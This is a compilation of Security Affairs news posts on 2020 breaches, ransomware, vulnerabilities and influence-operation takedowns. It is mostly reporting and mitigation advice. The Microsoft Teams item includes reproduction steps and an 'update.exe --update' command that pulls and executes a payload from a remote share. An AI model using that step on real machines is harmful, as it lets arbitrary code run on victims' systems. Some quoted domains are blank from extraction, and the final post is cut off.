Qualcomm and MediaTek Wi-Fi chips impacted by Kr00k-Like attacks

Pierluigi Paganini

(SecurityAffairs – cyber security, newsletter)

The post Security Affairs newsletter Round 276 appeared first on Security Affairs.

US OCC imposed an $80 Million fine to Capital One for 2019 hack

US Office of the Comptroller of the Currency (OCC) regulator has fined the credit card provider Capital One Financial Corp with $80 million over 2019 data breach.

The US Office of the Comptroller of the Currency (OCC) has imposed an $80 million fine to the credit card provider Capital One Financial Corp over 2019 data breach. Capital One, one of the largest U.S. card issuer and financial corporation, in 2019 it suffered a data breach that exposed personal information from more than 100 million credit applications.

A hacker that goes online with the handle “erratic” breached the systems at Capital One and gained access to personal information from 106 million Capital One credit applications.

Law enforcement identified and arrested the hacker behind the attack, he was a former Seattle technology company software engineer named Paige A. Thompson (33).

Paige Thompson is a transgender woman suspected to be the hacker behind the Capital One hack and attacks on 30 other organizations, in August 2019 he has been indicted on wire fraud and computer fraud.

The Office of the Comptroller of the Currency (OCC) is an independent bureau within the United States Department of the Treasury that was established by the National Currency Act of 1863 and serves to charter, regulate, and supervise all national banks and thrift institutions and the federally licensed branches and agencies of foreign banks in the United States.

The OCC claims that Capital One failed to implement an appropriate risk management process before migrating its IT operations to a public cloud-based service.

“The OCC took these actions based on the bank’s failure to establish effective risk assessment processes prior to migrating significant information technology operations to the public cloud environment and the bank’s failure to correct the deficiencies in a timely manner.” reads the press release published by the OCC”In taking this action, the OCC positively considered the bank’s customer notification and remediation efforts.”

The Bank also failed the implementation of an appropriate design and implementation of certain network security controls, adequate data loss prevention controls, and effective dispositioning of alerts.

The OCC pointed out that the internal audit conducted by Capital One failed to identify numerous control weaknesses and gaps in the cloud operating environment. The audit did not report on identified weaknesses and gaps to the Audit Committee.

The conduct of the bank was not compliant with the “Interagency Guidelines Establishing Information Security Standards” that are imposed on all the US banks.

Paige also accessed names, addresses, zip codes/postal codes, phone numbers, email addresses, dates of birth, and self-reported income, along with portions of credit card customer data, including: 

  • Customer status data, e.g., credit scores, credit limits, balances, payment history, contact information
  • Fragments of transaction data from a total of 23 days during 2016, 2017 and 2018

The hacker accessed bank account numbers and Social Security numbers only for a limited number of customers:

  • About 140,000 Social Security numbers of our credit card customers
  • About 80,000 linked bank account numbers of our secured credit card customers

The OCC also ordered Capital One Finance to enhance its cybersecurity security posture and share a plan to the OCC within 90 days detailing the process to do it.

Pierluigi Paganini

(SecurityAffairs – hacking, Capital One)

The post US OCC imposed an $80 Million fine to Capital One for 2019 hack appeared first on Security Affairs.

Homoglyph attacks used in phishing campaign and Magecart attacks

Researchers detailed a new evasive phishing technique that leverages modified favicons to inject e-skimmers and steal payment card data covertly.

Researchers from cybersecurity firm Malwarebytes have analyzed a new evasive phishing technique used by attackers in the wild in Magecart attacks. The hackers targeted visitors of several sites using typo-squatted domain names, and modified favicons to inject software skimmers used to steal payment card information.

The technique is known as homoglyph attack, it was involved in phishing scams with IDN homograph attacks.

“The idea is simple and consists of using characters that look the same in order to dupe users,” reads the analysis published by Malwarebytes researchers. “Sometimes the characters are from a different language set or simply capitalizing the letter ‘i’ to make it appear like a lowercase ‘l’.”

The internationalized domain name (IDN) homograph attack technique has been used by a Magecart group on multiple domains to load the Inter software skimmer inside a favicon file.

The visual trick leverages on the similarities of character scripts to and register fraudulent domains that appear similar to legitimate ones, then attackers trick victims into visiting them.

While analyzing homoglyph attacks, experts also found legitimate websites (e.g., “”) that were compromised and injected with an innocuous loader for an icon file that loaded a copycat version of the favicon from the typo-squatted domain (“cigarpaqe[.]com”).

This favicon loaded from the homoglyph domain allowed the attackers to inject the Inter JavaScript skimmer.

Experts noticed that one of the fraudulent domains (“”) involved in this type of attack has been previously tied to Magecart Group 8, the crew that was behind the attacks on NutriBullet, and MyPillow.

“A fourth domain stands out from the rest: This is also an homoglyph for, but that domain has a history. It was previously associated with Magecart Group 8 (RiskIQ)/CoffeMokko (Group-IB) and was recently registered again after several months of inactivity.” continues the analysis.

“In addition, Group 8 was documented in high-profile breaches, including one that is relevant here: the MyPillow compromise. This involved injecting a malicious third-party JavaScript hosted on (note the homoglyph on While homoglyph attacks are not restricted to one threat actor, especially when it comes to spoofing legitimate web properties, it is still interesting to note in correlation with infrastructure reuse.”

The combination of attack techniques allows threat actors to implement layers of evasion. Code re-use poses a problem for defenders makes the attribution of the attacks harder.

To avoid phishing attacks that are even more sophisticated users have to scrutinize the website URLs that intend to visit, avoid clicking links from emails, chat messages, and other publicly available content, and enable multi-factor authentication for their accounts to secure accounts from being hijacked.

Pierluigi Paganini

(SecurityAffairs – hacking, Homoglyph attacks)

The post Homoglyph attacks used in phishing campaign and Magecart attacks appeared first on Security Affairs.

Remotely hack a Mercedes-Benz E-Class is possible, experts demonstrated

Chinese researchers discovered tens of vulnerabilities in a Mercedes-Benz E-Class, including issues that can be exploited to remotely hack it.

A team of Chinese experts from Sky-Go, the Qihoo 360 division focused on car hacking, discovered 19 vulnerabilities in a Mercedes-Benz E-Class, including some issues that can be exploited by attackers to remotely hack a vehicle.

The experts analyzed a Mercedes E-Class model because it is a connected car with a powerful infotainment system with a rich set of functionalities.

The research began in 2018 and in August 2019, the experts reported their findings to Daimler, which owns the Mercedes-Benz. In December 2019, the carmaker announced a partnership with the 360 Group to strengthen car IT security for the industry.

“In 2018, we begin research on Mercedes-Benz, since it is one of the most famous car brands in the world and an industry benchmark in the automotive industry. We analyze the security of Mercedes-Benz cars. There are so many models from Mercedes-Benz, and we finally chose the research target on Mercedes-Benz E-Class, since the E-Class’s in-vehicle infotainment system has the most connectivity functionalities of all.” reads the research paper.

Last week, during the Black Hat cybersecurity conference, representatives of Sky-Go and Daimler disclosed the findings of their research. The experts avoided to publicly disclose technical details of the issues to prevent malicious exploitation in the wild.

The team of experts was able to exploit the flaws to remotely unlock the car’s doors and start the engine of a Mercedes-Benz E-Class. According to the experts, the flaw could have affected 2 million vehicles only in China.

The experts initially collected relevant information from the target devices, such as network topology, pin definitions, chip model, and enable signals in the car. Then disassembled the center panel in the car to analyze the wiring connections between the Electronic Control Units (ECUs).


The analysis of the file system of the vehicle’s Telematics Control Unit (TCU), to which they gained access by obtaining an interactive shell with root privileges, they uncovered passwords and certificates for the backend server.

“If we have to debug the TCU client programs dynamically, we need to tamper the filesystem to get an interactive shell with ROOT privileges.” continues the research.

The researchers were also able to gain access to backend servers by analyzing the vehicle’s embedded SIM (eSIM) card used for the external connectivity.

“Car Backend is the core of Connected Cars. As long as Car Backends’ services can be accessed externally, it means that car backend is at risk of being attacked. The vehicles connecting to this Car Backend are in danger, too. So, our next step is to try to access Car Backend.” continues the research. “For accessing the APN networks of backend, one possibility would be using the e-sim of car-parts since the sim account wouldn’t log out automatically. After tearing down this eSIM, we put it into the 4G router.”

Experts noticed the lack of authentication between the backend servers and the “Mercedes me” mobile app, which allows users to remotely control multiple functions of the car. The researchers explained that once they got access to the backend, they could control any car in China.

The experts said that they did not manage to hack any critical safety functions of the tested vehicles.

“During the research and joint workshop, we see so many security designs in Mercedes-Benz Connected Cars and these designs are protecting the cars from various attacks.” the paper concluded. “The capability of a car company to work jointly with researchers contributes to the overall security of our cars.”

Pierluigi Paganini

(SecurityAffairs – hacking, Mercedes)

The post Remotely hack a Mercedes-Benz E-Class is possible, experts demonstrated appeared first on Security Affairs.

FBI warns of Iran-linked hackers attempting to exploit F5 BIG-IP flaw

According to the FBI, Iranian hackers are actively attempting to exploit an unauthenticated RCE flaw, tracked as CVE-2020-5902, in F5 Big-IP ADC devices.

The FBI is warning of Iranian hackers actively attempting to exploit an unauthenticated remote code execution flaw (CVE-2020-5902) affecting F5 Big-IP application delivery controller (ADC) devices.

Early June, researchers at F5 Networks addressed the CVE-2020-5902 vulnerability, it resides in undisclosed pages of Traffic Management User Interface (TMUI) of the BIG-IP product.

The BIG-IP product is an application delivery controller (ADC), it is used by government agencies and major business, including banks, services providers and IT giants like Facebook, Microsoft and Oracle.

F5 Networks says the BIG-IP devices are used on the networks of 48 companies included in the Fortune 50 list.

Immediately after the disclosure of the issue, the US Cyber Command posted a message on Twitter urging organizations using the F5 product to immediately patch their installs.

The vulnerability could be exploited by attackers to gain access to the TMUI component to execute arbitrary system commands, disable services, execute arbitrary Java code, and create or delete files, and potentially take over the BIG-IP device

The CVE-2020-5902 vulnerability received a CVSS score of 10, this means that is quite easy to exploit. The issue could be exploited by sending a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

Immediately after the public disclosure of the flaw, that several proof-of-concept (PoC) exploits have been released, some of them are very easy to use.

A few days after the disclosure of the vulnerability in the F5 Networks BIG-IP product threat actors started exploiting it in attacks in the wild. Threat actors exploited the CVE-2020-5902 flaw to obtain passwords, create web shells, and infect systems with various malware.

US CISA launched an investigation in potential compromise in multiple sectors with the support of several entities and confirmed two compromises.

“As early as July 6, 2020, CISA has seen broad scanning activity for the presence of this vulnerability across federal departments and agencies—this activity is currently occurring as of the publication of this Alert.” continues the alert.

This week, the FBI issued a Private Industry Notification (PIN) to warn that the Iran-linked threat actors are attempting to exploit the flaw since early July 2020. The PIN also includes indicators of compromise (IOCs) and Tactics, Techniques and Procedures (TTPs) associated with the attackers.

According to the FBI, Iranian nation-state hackers could exploit the flaw in F5 Big-IP ADC devices to gain access to the target networks, exfiltrate sensitive information, steal credentials, and drop several types of malware, including ransomware

The FBI PIN is based on the analysis of the group’s previous TTPs, which suggests the hackers will attempt to exploit the CVE-2020-5902 vulnerability to compromise unpatched F5 Big-IP ADC devices used by organizations in many industries.

The same threat actors were behind multiple attacks targeting unpatched VPN devices since August 2019, such as Pulse Secure VPN servers and Citrix ADC/Gateway.

The FBI is also warning private industry organizations, that Iranian hackers also use web shells to establish permanent access to the compromised networks and to regain access even after the systems have been patched following a cyber attack.

Experts also observed that the threat actors leverage post-exploitation tools such as Mimikatz and network reconnaissance tools.

Administrators are recommended to use F5’s CVE-2020-5902 IoC Detection Tool to detect potential compromise within their infrastructure.

Below the list of recommendations for the organizations to mitigate the exposure to attacks exploiting the CVE-2020-5902 vulnerability:

• Quarantine or take offline potentially affected systems
• Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections
• Deploy a CISA-created Snort signature to detect malicious activity (available in the alert under Detection Methods)

In case organizations find evidence of CVE-2020-5902 exploitation, they are urged to implement the following recovery measures for the compromised systems:

• Reimaging compromised hosts
• Provisioning new account credentials
• Limiting access to the management interface to the fullest extent possible
• Implementing network segmentation

“CISA expects to see continued attacks exploiting unpatched F5 BIG-IP devices and strongly urges users and administrators to upgrade their software to the fixed versions,” the agency concludes.

“CISA also advises that administrators deploy the signature included in this Alert to help them determine whether their systems have been compromised.”

Pierluigi Paganini

(SecurityAffairs – hacking, F5 BIG-IP)

The post FBI warns of Iran-linked hackers attempting to exploit F5 BIG-IP flaw appeared first on Security Affairs.

Qualcomm and MediaTek Wi-Fi chips impacted by Kr00k-Like attacks

Wi-Fi chips manufactured by Qualcomm and MediaTek are impacted by vulnerabilities similar to the Kr00k issue disclosed early this year.

Earlier this year, experts from ESET disclosed the Kr00k, a new high-severity hardware vulnerability, that affects Wi-Fi chips manufactured by Broadcom and Cypress.

The Kr00k vulnerability, tracked as CVE-2019-15126, could be exploited by nearby remote attackers to intercept and decrypt some wireless network packets transmitted over-the-air by a vulnerable device.

The attacker could exploit the Kr00k issue even when it is not connected to the victim’s wireless network, the vulnerability works against vulnerable devices using WPA2-Personal or WPA2-Enterprise protocols, with AES-CCMP encryption.


An attacker could exploit the Kr00k vulnerability after forcing a device from disconnecting from a Wi-Fi network.

Experts pointed out that the vulnerability does not reside in the Wi-Fi encryption protocol, instead, the issue is related to the way some chips implemented the encryption. Researchers pointed out that communications protected by TLS cannot be recovered by exploiting this vulnerability.

The flaw doesn’t affect modern devices using the WPA3 protocol.

Both Broadcom and Cypress addressed the flaw releasing security patches. Impacted products included devices from Amazon, Apple, Asus, Huawei, Google Samsung, and Xiaomi.

Wi-Fi chips from Qualcomm, Ralink, Realtek and MediaTek are not impacted by the Kr00k issue, but unfortunately, ESET experts discovered that they are affected by similar flaws.

Qualcomm Wi-Fi chips are impacted by a vulnerability tracked as CVE-2020-3702, the attacker could steal sensitive data after triggering a disassociation. Unlike Kr00k attacks, the attacker is not able to access to all the encrypted data because the process doesn’t use a single zero key for encryption.

“One of the chips we looked at, aside from those from Broadcom and Cypress, was by Qualcomm. The vulnerability we discovered (which was assigned CVE-2020-3702) was also triggerable by a disassociation and led to undesirable disclosure of data by transmitting unencrypted data in the place of encrypted data frames – much like with KrØØk. The main difference is, however, that instead of being encrypted with an all-zero session key, the data is not encrypted at all (despite the encryption flags being set).” reads the analysis published by ESET.

The ESET researchers discovered that the issue affects some of the devices they tested, including D-Link DCH-G020 Smart Home Hub and the Turris Omnia wireless router. This means that any other unpatched devices using the vulnerable Qualcomm chipsets will also be vulnerable.

Qualcomm addressed the issue by releasing a security patch for its proprietary driver in July, but experts pointed out that some devices use open-source Linux drivers and it’s not clear if those will be patched as well.

Experts found a similar issue affecting MediaTek Wi-Fi chips that don’t use encryption at all. The impacted chips are used in Asus routers and even in the Microsoft Azure Sphere development kit.

“One of the affected devices is the ASUS RT-AC52U router. Another one is the Microsoft Azure Sphere development kit, which we looked into as part of our Azure Sphere Security Research Challenge partnership.” continues the research.

“Azure Sphere uses MediaTek’s MT3620 microcontroller and targets a wide range of IoT applications, including smart home, commercial, industrial and many other domains,”

MediaTek released patches in March and April, while the Azure Sphere OS was patched in July.

ESET experts have released a script that could allow users to determine if a device is vulnerable to Kr00k or similar attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, Kr00k)

The post Qualcomm and MediaTek Wi-Fi chips impacted by Kr00k-Like attacks appeared first on Security Affairs.

Reddit massive hack: hackers defaced channels with pro-Trump messages

Reddit suffered a massive hack, threat actors compromised tens of Reddit channels and defaced them showing messages in support of Donald Trump’s campaign.

Reddit suffered a massive hack, threat actors defaced tens of channel to display messages in support of Donald Trump’s reelection campaign.

At the time of writing, the massive hack is still ongoing and Reddit’s security team is working to restore the operations.

Below a list containing some of the impacted subreddits, some of them having tens of millions of members:

According to Reddit, the hacker compromised several subreddit moderator accounts.

Owners of the channel that are facing security issues could report problems in this Reddit ModSupport thread, meantime they are recommended to enable two-factor authentication (2FA) on their accounts and to change their passwords.

Indicators of compromise for the Reddit moderator accounts are:

• moderator received email notification that the password and/or email address on your account changed but you didn’t request changes
• moderator notice authorized apps on your profile that you don’t recognize
• moderator notice unusual IP history on your account activity page
• moderator see votes, posts, comments, or moderation actions that you don’t remember making, or private messages that you don’t remember sending

One of the moderators who had their account compromised published the details of the actions performed by attackers on his behalf.

Help! I’ve been hacked by some bizarre pro-trump bot! It wrecked my subreddit’s style sheet, deleted all mods below me, updated the wiki… I’m in way over my head. What can I do? PSA: Change your passwords and enable 2-factor authentication!” reads the title of the discussion.

Once the attacker has taken the control of the mod’s account, he changed his subrreddit’s CSS stylesheet, deleted all mods with fewer permissions than him, and changed the community’s wiki.

Finally, the hacker published the message: “We Stand With Donal Trump #MIGA2020.”

The Twitter account claimed responsibility for the massive Reddit hack, but currently, the account was suspended. While the hackers were targeting subreddits, they asking Twitter users to vote on them.

Source BleepingComputer

In June, Reddit has banned a channel of President Trump supporters, r/The_Donald, after he received reports of harassment, bullying, and threats of violence.

Pierluigi Paganini

(SecurityAffairs – hacking, Trump)

The post Reddit massive hack: hackers defaced channels with pro-Trump messages appeared first on Security Affairs.

Did Maze ransomware operators steal 10 GB of data from Canon?

An internal memo confirms that the prolonged outage suffered by Canon last week was caused by a ransomware infection, Maze operators took credit for it.

According to an internal memo obtained by ZDNet, the recent outage of Canon was caused by a ransomware attack, while Maze ransomware operators are taking the credit for the incident.

The memo also reveals that the company has hired an external security firm to investigate the incident.

The problem was first reported by Bleepingcomputer, which tracked a suspicious outage on Canon’s cloud photo and video storage service. According to the media outlet, the alleged incident resulted in the loss of data for users of their free 10GB storage feature.

The site suffered an outage on July 30th, 2020, that lasted for six days, until August 4th.

At the time the company only confirmed an internal investigation on a problem related to “10GB of data storage.”

According to Canon, some of the photo and image files saved prior to June 16 were “lost,” but it pointed out that they were not exposed in a data leak.

“Currently, the still image thumbnails of these lost image files can be viewed but not downloaded or transferred,” reads the notice issued by Canon. “If a user tries to download or transfer a still image thumbnail file, an error may be received.”

At the same time, the company issued an internal memo that warned employees of “company-wide” IT issues, which also impacted email systems. 

Maze ransomware operators announced to have stolen 10TB of data as a result of a ransomware attack against the company but denied responsibility for the issues. If confirmed this means that the outage was not caused by the ransomware infection, but that anyway Maze operators have exfiltrated 10 GB of data from the company. Another memo sent to the employees specifically refers a “ransomware incident” and revealed that Canon has hired a cyber forensics firm to investigate the intrusion.

Maze ransomware operators recently published internal data from LG and Xerox after the company did not pay the ransom.

As usual, the Maze ransomware operators threaten the victims to pay the ransom to avoid their data being leaked online. 

Maze ransomware operators have also breached the systems of the Xerox Corporation and stolen files before encrypting them.

In the past months Maze Ransomware gang breached the US chipmaker MaxLinear and Threadstone Advisors LLP, a US corporate advisory firm specialising in mergers ‘n’ acquisitions.

Maze operators were very active during the past months, they have also stolen data from US military contractor Westech and the ST Engineering group, and they have released credit card data stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Previous victims of the ransomware gang include IT services firms Cognizant and Conduent.

Pierluigi Paganini

(SecurityAffairs – hacking, Maze ransomware)

The post Did Maze ransomware operators steal 10 GB of data from Canon? appeared first on Security Affairs.

Intel investigates security breach after the leak of 20GB of internal documents

Intel is investigating reports of an alleged hack that resulted in the theft and leak of 20GB of data coming from the chip giant.

Intel is investigating reports that an alleged hacker has leaked 20GB of exfiltrated from its systems. The stolen data includes source code and developer documents and tools, some documents are labeled as “confidential” or “restricted secret.”

The hackers shared the documents on the file-sharing site MEGA.

The leak was first published by Till Kottmann, a Swiss software engineer, who manage a very popular Telegram channel on data leak. In the past, he shared data on several leaks from major companies including Microsoft, Adobe, GE, Disney, AMD, Lenovo, Motorola, Qualcomm, Mediatek, and Nintendo.

The engineering received the files from an anonymous hacker who claimed to have hacked the company earlier this year, the experts believe that this leak is just a first lot on a larger collection.

Several media outlets independently analyzed the data leak and verified the authenticity of the data.

“Per our analysis, the leaked files contained Intel intellectual property respective to the internal design of various chipsets. The files contained technical specs, product guides, and manuals for CPUs dating back to 2016.” reported ZDNet.

A company spokesperson told SecurityWeek that the data appears to come from the Intel Resource and Design Center. The Center manages information for use by our customers, partners and other external parties.

Below a list of the content included in the leak:

  • Intel ME Bringup guides + (flash) tooling + samples for various platforms
  • Kabylake (Purley Platform) BIOS Reference Code and Sample Code + Initialization code (some of it as exported git repos with full history)
  • Intel CEFDK (Consumer Electronics Firmware Development Kit (Bootloader stuff)) SOURCES
  • Silicon / FSP source code packages for various platforms
  • Various Development and Debugging Tools
  • Simics Simulation for Rocket Lake S and potentially other platforms
  • Various roadmaps and other documents
  • Binaries for Camera drivers Intel made for SpaceX
  • Schematics, Docs, Tools + Firmware for the unreleased Tiger Lake platform
  • Kabylake FDK training videos
  • Intel Trace Hub + decoder files for various Intel ME versions
  • Elkhart Lake Silicon Reference and Platform Sample Code
  • Debug BIOS/TXE builds for various Platforms
  • Bootguard SDK (encrypted zip)
  • Intel Snowridge / Snowfish Process Simulator ADK
  • Various schematics
  • Intel Marketing Material Templates (InDesign)

The good news is that the leaked files doesn’t contain sensitive data about customers or employees of the chip maker.

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Intel investigates security breach after the leak of 20GB of internal documents appeared first on Security Affairs.

Google Threat Analysis Group took down ten influence operations in Q2 2020

Google published its second Threat Analysis Group (TAG) report which reveals the company has taken down ten coordinated operations in Q2 2020.

Google has published its second Threat Analysis Group (TAG) report, a bulletin that includes coordinated influence operation campaigns tracked in Q2 of 2020.

Google revealed to have taken down ten coordinated operations in Q2 2020 (between April and June 2020), the campaigns were traced back to China, Russia, Iran, and Tunisia.

The report is based on the investigations conducted by the Threat Analysis Group (TAG) and third-parties’ contributions (i.e. social media analysis firm Graphika, cyber-security firm FireEye, the Atlantic Council investigation unit).

The latest TAG Bulletin covers influence ops takedowns that have taken place in the second quarter of this year, between April and June 2020.

In April, as part of a campaign carried out by Iran-linked threat actors, Google closed 16 YouTube channels, 1 advertising account and 1 AdSense account. The accounts were linked to the Iranian state-sponsored International Union of Virtual Media (IUVM) network, which also shared content in Arabic related to the US’ response to COVID-19 and the relationship of the US with Saudi Arabia.

Google also terminated 15 YouTube channels and 3 blogs as part of a campaign carried out by Russia-linked threat actors, which posted content in English and Russian about the EU, Lithuania, Ukraine, and the US

The Threat Analysis Group terminated another campaign from Russia, the IT giant closed 7 YouTube channels used to share content in Russian, German, and Farsi about Russian and Syrian politics and the U.S. response to COVID-19.

The TAG team also dismantled another campaign conducted by China-linked attackers. The experts terminated 186 YouTube channels, but only a subset was used to post political content primarily in Chinese, criticizing the response of the US government to the COVID-19 pandemic.

Another campaign blocked by Google leveraged 3 YouTube channels used by Iran-linked hackers to publish content in Bosnian and Arabic that was critical of the U.S. and the People’s Mujahedin Organization of Iran (PMOI), a militant organization fighting against the official Iranian government.

In May the TAG blocked 1,098 YouTube channels used by China-linked hackers to criticize the US’ response to the COVID-19 pandemic.

Google also terminated 47 YouTube channels and 1 AdSense account linked to Russia and used to spread into about domestic Russian and international policy issues.

In June, Google terminated 1,312 YouTube channels used by China-linked threat actors for the same purposes of campaigns reported in April and May.

In the same month, Google terminated 17 YouTube channels linked to Russia 3 Google Play developers and 1 advertising account linked to Tunisian PR company Ureputation.

Pierluigi Paganini

(SecurityAffairs – hacking, Google Threat Analysis Group)

The post Google Threat Analysis Group took down ten influence operations in Q2 2020 appeared first on Security Affairs.

Netwalker ransomware operators claim to have stolen data from Forsee Power

Netwalker ransomware operators breached the networks of Forsee Power, a well-known player in the electromobility market.

A new company has been added to the list of the victims of the Netwalker ransomware operators, it is Forsee Power, which provides advanced lithium-ion battery systems for any mobility application.

The industrial group is based in France and in the US USA, it is one of the market leaders in Europe, Asia, and North America with annual revenue of around $65 million and over 200 employees.

Recently Cyble threat research group came across another disclosure from the Netwalker group that announced to have stolen sensitive data from Forsee Power.

Netwalker ransomware operators announced the attack with a message posted on their online blog and shared a few screenshots as proof of the security breach.

One of the images shared by the group shows a directory containing folders such as Accounts Receivable, Finance, collection letters, Expenses, and Employees. 

Below some tips on how to prevent ransomware attacks provided by Cyble:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Recently the FBI has issued a security alert about Netwalker ransomware attacks targeting U.S. and foreign government organizations.

The feds are recommending victims, not to pay the ransom and reporting incidents to their local FBI field offices.

The flash alert also includes indicators of compromise for the Netwalker ransomware along with mitigations.

The FBI warns of a new wave of Netwalker ransomware attacks that began in June, the list of victims includes the UCSF School of Medicine and the Australian logistics giant Toll Group.

The Netwalker ransomware operators have been very active since March and also took advantage of the ongoing COVID-19 outbreak to target organizations.

The threat actors initially leveraged phishing emails delivering a Visual Basic Scripting (VBS) loader, but since April 2020, Netwalker ransomware operators began exploiting vulnerable Virtual Private Network (VPN) appliances, user interface components in web apps, or weak passwords of Remote Desktop Protocol connections to gain access to their victims’ networks.

Recently the Netwalker ransomware operators were looking for new collaborators that can provide them with access to large enterprise networks. 

Below the recommended mitigations provided by the FBI:

  • Back-up critical data offline.
  • Ensure copies of critical data are in the cloud or on an external hard drive or storage device.
  • Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update anti-virus or anti-malware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks.
  • Consider installing and using a VPN.
  • Use two-factor authentication with strong passwords.
  • Keep computers, devices, and applications patched and up-to-date.

Pierluigi Paganini

(SecurityAffairs – Netwalker ransomware, Forsee Power)

The post Netwalker ransomware operators claim to have stolen data from Forsee Power appeared first on Security Affairs.

FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life

The FBI warned private industry partners of risks impacting companies running Windows 7 after the Microsoft OS reached the end of life on January 14.

The Federal Bureau of Investigation is warning companies running Windows 7 systems of the greater risk of getting hacked because the Microsoft OS has reached the end of life on January 14.

Early this week, the FBI has sent a private industry notification (PIN Number 20200803-002) to partners in the US private sector.

“The FBI has observed cyber criminals targeting computer network infrastructure after an operating system achieves end of life status,” reads the the FBI’s PIN.

“Continuing to use Windows 7 within an enterprise may provide cyber criminals access in to computer systems. As time passes, Windows 7 becomes more vulnerable to exploitation due to lack of security updates and new vulnerabilities discovered.”

“With fewer customers able to maintain a patched Windows 7 system after its end of life, cyber criminals will continue to view Windows 7 as a soft target,”

Feds urge organizations to upgrading their systems running Windows 7 to newer versions for which the IT giant is still providing security updates.

“Upgrading operating systems to the latest supported version. Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.” continues the PIN.

Microsoft still allows its Windows 7 users to upgrade to Windows 10 for free, but sometimes the underlying hardware doesn’t support the free upgrade.

The FBI cited the case of previous Windows XP migration, many systems that were not upgraded remained exposed to a significant number of attacks.

“Increased compromises have been observed in the healthcare industry when an operating system has achieved end of life status. After the Windows XP end of life on 28 April 2014, the healthcare industry saw a large increase of exposed records the following year,” the FBI said.

The experts explained that threat actors could exploit multiple known vulnerabilities impacting Windows 7 to compromise the systems running the popular Microsoft OS.

For many of these flaws, it is possible to find online working exploits. such as the EternalBlue and BlueKeep exploits

The FBI added that several companies have yet to patch its systems and urged them to apply the upgrade, the agency also provided the following recommendations:

  • Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.
  • Auditing network configurations and isolate computer systems that cannot be updated.
  • Auditing your network for systems using RDP, closing unused RDP ports, applying two-factor authentication wherever possible, and logging RDP login attempts.

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life appeared first on Security Affairs.

Hackers can abuse Microsoft Teams updater to deliver malicious payloads

Threat actors can abuse Microsoft Teams updater to retrieve and execute malicious code from a remote location.

Security experts from Trustwave detailed the  Living Off the Land technique that could allow a threat actor to abuse the MS Teams Updater to download any binary or malicious payload from a remote server.

The bad news is that the issue could not be easily addressed because it is a design flaw.

The solution previously proposed to address the Teams issue consists in restricting its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.

“As per the patch, Microsoft Teams Updater will allow only local network paths to access and update, that means it will detect the string “http/s”, “:”, “/” and port numbers in the updater URL, blocks and log the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log.” reads the analysis published by Trustwave.

The mechanism allows share access in the local UNC format: \\server\

An attacker could exploit it if the following conditions are met:

  1. Attackers have to get the file inside the network in an open shared folders;
  2. Attackers have access to the payload from that share to the victim machine;

Experts noticed that this attack scenario is not easy to implement.

To simplify the attack chain, an attacker can create a remote rather than local share. In this way, the attacker can download the remote payload and execute it without accessing to a local share.

To create a remote share, the experts set up a Samba server that allowed remote public access, the they were able to download the remote payload and run it from Microsoft Teams Updater “Update.Exe” using the following command:

Update.exe --update=\\remoteserver\payloadFolder

Microsoft Teams leverages the open-source project Squirrel for installation and updating routines. Squirrel relies on NuGet package manager to create the necessary files.

The payload needs to have the name “squirrel.exe” and have to be placed in a particular nupkg file. The file has to be crafted using the metadata of the fake Microsoft Teams release and the installation is in the AppData folder, which does not require increased privileges for access.

The post published by Trustwave includes a step by step procedure to carry out the attack to bypass the current mitigations in the application.

Below the steps to reproduce the attack:

  1. Go to target application folder “%localappdata%/Microsoft/Teams/” on the victim system
  2. Run the below command:
    update.exe –update=[Samba server contains the above 2 files]
    e.g. update.exe –update=\\remoteserver\payloadFolder

After some seconds (wait for 10-15 seconds), the payload will be downloaded successfully and executed by Microsoft Teams.

The researcher Reegun Jayapaul from Trustwave attempted to report the issue to Microsoft the provide the following reply:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as “we cannot restrict SMB source for –update because we have customers that apparently rely on this (e.g. folder redirection)” replied Microsoft

Possible mitigations include monitoring “update.exe” command lines for dubious connections and checking anomalies in the size and the hash of “squirrel.exe.”

Tracking SMB connections, especially those from Microsoft Teams’ updater, could allow us to detect malicious activities.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Teams)

The post Hackers can abuse Microsoft Teams updater to deliver malicious payloads appeared first on Security Affairs.

Cyber Defense Magazine – August 2020 has arrived. Enjoy it!

Cyber Defense Magazine august 2020 Edition has arrived. We hope you enjoy this month’s edition…packed with over 147 pages of excellent content.

Learn from the experts, cybersecurity best practices

Find out about upcoming information security related conferences, expos and trade shows.  Always free, no strings attached.







Do you like Yumpu?  Here’s a Yumpu version:

Enjoy and Thank You for Joining Us!
Let’s get one step ahead of the next threat,

Cyber Security Magazine
with a Consumer Focus (B2C)***NEW***
Don’t miss out: two unique webinars each month….

Cyber Defense Webinars

Please visit CYBER DEFENSE TV and watch our latest interviews…We have 80+ NEW INTERVIEWS BEING UPLOADED THIS MONTH!!!Please visit Cyber Defense Radio for streaming and downloadable podcasts…THE BLACK UNICORN REPORT FOR 2020 IS NOW ONLINEHighlighted Sponsors This Month:

RSA CONFERENCE 2020Want to sponsor our eMagazine? 

Checkout our 
media kit and reach out to

Pierluigi Paganini

(SecurityAffairs – hacking, cyber defense magazine)

The post Cyber Defense Magazine – August 2020 has arrived. Enjoy it! appeared first on Security Affairs.

NSA releases a guide to reduce location tracking risks

The United States National Security Agency (NSA) is warning of risks posed by location services for staff who work in defence or national security.

The United States National Security Agency (NSA) published a new guide to warn of the risks posed by location services for staff who work in defence or national security.

The guide, titled “Limiting Location Data Exposure” warn of geolocation features implemented by smartphones, tablets, and fitness trackers.

